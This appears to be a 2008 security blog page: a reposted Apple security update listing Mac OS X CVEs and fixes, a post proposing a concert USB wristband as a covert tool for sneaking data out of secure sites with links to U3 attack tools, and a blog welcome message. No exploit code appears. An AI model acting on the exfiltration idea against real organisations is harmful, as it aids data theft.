Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A malicious proxy server may spoof secure websites

Description: A malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2.

ClamAV

CVE-ID: CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in ClamAV 0.90.3

Description: Multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net

ClamAV

CVE-ID: CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.4.11

Impact: Multiple vulnerabilities in ClamAV 0.88.5

Description: Multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net

CoreFoundation

CVE-ID: CVE-2008-0051

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: An integer overflow exists in CoreFoundation's handling of time zone data. This may allow a local user to cause arbitrary code execution with system privileges. This update addresses the issue through improved bounds checking on time zone data files. This issue does not affect systems running Mac OS X v10.5 or later.

CoreServices

CVE-ID: CVE-2008-0052

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a website could cause files to be opened in AppleWorks

Description: Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed.

CUPS

CVE-ID: CVE-2008-0596

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A remote attacker may be able to cause an unexpected application termination if printer sharing is enabled

Description: A memory leak exists in CUPS. By sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue can not result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5.

CUPS

CVE-ID: CVE-2008-0047

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to cause an unexpected application termination or arbitrary code execution if printer sharing is enabled

Description: A heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to regenrecht working with the VeriSign iDefense VCP for reporting this issue.

CUPS

CVE-ID: CVE-2008-0053, CVE-2008-0882

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in CUPS may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5.

curl

CVE-ID: CVE-2005-4077

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running curl with a maliciously crafted URL may lead to an unexpected application termination or arbitrary code execution

Description: A one byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. This issue does not affect systems running Mac OS X v10.5 or later.

Emacs

CVE-ID: CVE-2007-6109

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Format string vulnerability in Emacs Lisp may lead to an unexpected application termination or possibly arbitrary code execution

Description: A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution. Further information on the patch applied is available via the Savannah Emacs website here.

Emacs

CVE-ID: CVE-2007-5795

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Safe mode checks in Emacs may be bypassed

Description: A logic error in Emacs' hack-local-variable function allows any local variable to be set, even if `enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks. The patch applied is available via the Savannah Emacs website here.
This issue does not affect systems prior to Mac OS X v10.5.

file

CVE-ID: CVE-2007-2799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running the file command on a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Colin Percival of the FreeBSD security team for reporting this issue.

Foundation

CVE-ID: CVE-2008-0054

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSSelectorFromString API may result in an unexpected method being called

Description: An input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0055

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user can interfere in other users' file operations and may be able to obtain elevated privileges

Description: When performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using t he API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0056

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Programs using the NSFileManager API could be manipulated to execute arbitrary code

Description: A long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0058

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to a denial of service or arbitrary code execution

Description: A thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection. This update addresses the issue by removing an unsynchronized caching operation. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Daniel Jalkut of Red Sweater Software for reporting this issue.

Foundation

CVE-ID: CVE-2008-0059

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Processing an XML document may lead to an unexpected application termination or arbitrary code execution

Description: A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. This issue does not affect systems running Mac OS X v10.5 or later.

Help Viewer

CVE-ID: CVE-2008-0060

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted help: URL may lead to arbitrary Applescript execution

Description: A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs Applescript. This update addresses the issue by performing HTML escaping on the URL data used in help topic lists before building the generated page. Credit to Brian Mastenbrook for reporting this issue.

Image Raw

CVE-ID: CVE-2008-0987

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Viewing a maliciously crafted image may lead to an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5. Credit to Clint Ruoho of Laconic Security for reporting this issue.

Kerberos

CVE-ID: CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, CVE-2008-0063

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in MIT Kerberos 5 may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/ CVE-2008-0062 and CVE-2008-0063 do not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4.

libc

CVE-ID: CVE-2008-0988

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Applications that use the strnstr API could be vulnerable to a denial of service

Description: An off by one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Mike Ash of Rogue Amoeba Software for reporting this issue.

mDNSResponder

CVE-ID: CVE-2008-0989

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5.

notifyd

CVE-ID: CVE-2008-0990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to deny access to notifications

Description: notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. This issue does not affect systems running Mac OS X v10.5 or later.

OpenSSH

CVE-ID: CVE-2007-4752

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to execute arbitrary code with elevated privileges

Description: OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7. Further information is available via the OpenSSH website here.

pax archive utility

CVE-ID: CVE-2008-0992

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Running the pax command on a maliciously crafted archive may lead to arbitrary code execution

Description: The pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. This issue does not affect systems prior to Mac OS X v10.5.

PHP

CVE-ID: CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, CVE-2007-4887

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 5.2.4

Description: PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/ PHP version 5.2.x is only provided with Mac OS X v10.5 systems.

PHP

CVE-ID: CVE-2007-3378, CVE-2007-3799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 4.4.7

Description: PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/

Podcast Producer

CVE-ID: CVE-2008-0993

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Podcast Capture exposes passwords to other local users

Description: The Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. This issue does not affect systems prior to Mac OS X v10.5. Credit to Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.

Preview

CVE-ID: CVE-2008-0994

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Saving to encrypted PDF in Preview produces files that may be read without the password

Description: When Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4.

Printing

CVE-ID: CVE-2008-0995

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to encrypted PDF produces files that may be read without the `open' password

Description: Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5.

Printing

CVE-ID: CVE-2008-0996

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to an authenticated print queue may disclose login credentials

Description: An information disclosure issue exists in the handling of authenticated print queues. When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5.

System Configuration

CVE-ID: CVE-2008-0998

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program. This update addresses the issue by performing additional validation of distributed objects.

UDF

CVE-ID: CVE-2008-0999

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Opening a maliciously crafted disk image may lead to an unexpected system shutdown

Description: A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5. Credit to Paul Wagland of Redwood Software, and Wayne Linder of Iomega for reporting this issue.

Wiki Server

CVE-ID: CVE-2008-1000

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A user with access to edit wiki content may be able to execute arbitrary commands as the wiki server

Description: A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5. Credit to Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies.

X11

CVE-ID: CVE-2007-4568, CVE-2007-4990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Multiple Vulnerabilities in X11 X Font Server (XFS) 1.0.4

Description: Multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security These issues are already addressed in systems running Mac OS X v10.5.2.

X11

CVE-ID: CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, CVE-2007-5269

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in X11's libpng 1.2.8

Description: The PNG reference library (libpng) is updated to version 1.2.24 to address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html This issue affects libpng within X11. It does not affect systems prior to Mac OS X v10.5.

X11

CVE-ID: CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, CVE-2007-6429

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in the X11 server

Description: Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend. This update fixes the issue by applying the updated X.Org patches. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security

Go update!

Joel Esler
http://www.joelesler.net

Matchbox Twenty Wristband Turned Pentesting Tool

2008-03-13T16:20:00.000-07:00

Before I start my new job I've been on vacation in Canada. Maybe it's because I came here straight from Shmoocon, or maybe I'm just a big security geek, but even on holiday I managed to make a fun find.

My girlfriend is a huge fan of Matchbox Twenty and as they were playing in Vancouver we went to see them. The barcode scanners weren't working so they ripped the barcode off our ticket to scan it later. If it didn't validate I don't know what they planned to do, but if the ticket tout outside knew this little detail he could have sold a lot more tickets I'm sure. After security failed to search us because we used the small side door they opened temporarily, in we walked, past an exposed ethernet and phone jack I would have loved to played with. Everywhere I go i notice fun little things like this, J0hnny Long would be proud.

Anyway back to my point. As we had the "silver package", after the concert they gave us a special wristband. Not just any wristband, a USB wristband containing live recordings of the concert we just walked out of.

Turns out its a completely reusable 247mb usb drive (Chipsbnk USB 2.0 rev_5.00), all hidden in a rubber wristband.

The usb connector doubles as the clip, so when you are wearing it you see nothing but the rubber wristband.

Hopefully you are seeing where I'm going with this. In you walk to a secure site wearing an innocent wristband. Even if they x-ray or metal detect you, that metal is just the clip for your wristband right? And out you walk with sensitive data around your wrist.

Granted its only a small drive, but I'm sure it could be modified. Imagine for example, if the drive was U3 (if you don't know what mischief U3 can cause check out http://wiki.hak5.org/wiki/USB_Hacksaw and http://wiki.hak5.org/wiki/USB_Switchblade).

With so many portable and wireless devices, and ever smaller and higher capacity storage devices, you have to be extremely alert to catch how data could be exfiltrated.

If you want your very own wristband exfiltration device, erm, I mean Matchbox Twenty concert wristband, you can buy them here. A little pricey as you are buying the music content as well. Who would have thought I would find my new favourite pentesting tool at a concert!

Welcome To PaulDotCommunity

2008-03-11T13:58:00.001-07:00

We are very excited to present this blog to the security community. There are so many talented people that listen to the show, manage our wiki, participate on our mailing list, and hang out in our IRC channel. Their voices should be heard, so we created this blog to give them a voice and place to post content. Just about anyone in our community can post to this blog, all you have to do is send us an email and we will grant you access (we should at least be able to recognize your name, your previous work, have someone vouch for you, etc...). We would like to so postings with the following content:

Show People How - We strive to show people how to do things, and believe this blog should too.
Interesting - We try not to cover the average, everyday, run-of-the-mill security stories, research, hacking techniques, etc... This blog should live by the same standards
Relevant and Helpful - Anything that proves to be useful to others in the community should be posted here, we will most likely discuss all of the posts to this blog on the show!

So, we hope to hear from many of you, and happy blogging!

Cheers,

PaulDotCom